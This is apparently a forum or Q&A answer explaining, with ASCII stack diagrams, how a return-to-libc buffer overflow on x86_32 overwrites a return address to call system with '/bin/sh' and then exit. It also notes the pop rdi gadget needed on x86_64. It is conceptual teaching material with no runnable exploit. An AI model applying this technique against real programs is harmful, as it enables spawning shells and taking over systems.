This is because on x86, stacks grow downwards (towards lower addresses), but buffers are filled upwards (towards higher addresses):
When writing out of the buffer, you are clobbering the return address of the stack frame above, at a higher address.
The ret
instruction will then pop the return address off the stack and continue execution at the beginning of system
. Then, system
will pop its arguments off the stack, and upon returning, pop the address of the next function off the stack, i.e. the stack shrinks as you go through the chain, and the stack pointer grows larger.
The reason that the address of /bin/sh
can be written on the stack lies in the calling convention used by gcc
on x86_32 linux, which is very close to the System V calling convention (see Figure 3-15). In contrast, on x86_64, the first arguments are passed in registers (rdi
, rsi
, rcx
), so you would need a pop rdi; ret
gadget before you can return to system
.
To understand the order of the values written to the stack, let's look at a single stack frame:
high addresses
+----------------+
| |
| arguments |
| |
+----------------+
esp -> | return address |
+----------------+
| |
| locals |
| |
+----------------+
low addresses
Putting this together to a payload, we get:
high addresses
+----------------+ -+
| arg0 | |
+----------------+ | stack frame of system
| return address | exit |
+----------------+ -+
esp -> | return address | system |
+----------------+ |
| | ^ | stack frame of victim
| buffer | | overflow |
| | + |
+ . . . . . . . .+ :
low addresses
The buffer being overflown is a local buffer in the victim function, and its return address gets overwritten. The ret
instruction will pop the return address off the stack into eip
, so execution will continue in system
.
At this point, the stack looks like this, with space below esp
usable by system
for its locals (actually, the diagram is not quite correct, as system
pushes locals
, the stack pointer will of course decrease):
high addresses
+----------------+ -+
| arg0 | |
+----------------+ | stack frame of system
esp -> | return address | exit |
+----------------+ |
| | |
| locals | |
| | |
+ . . . . . . . .+ :
low addresses
To access the argument, system
will use the [reg+displacement]
addressing mode, to access [esp+4]
. At the end of its execution, it will call ret
, which will continue execution in exit
.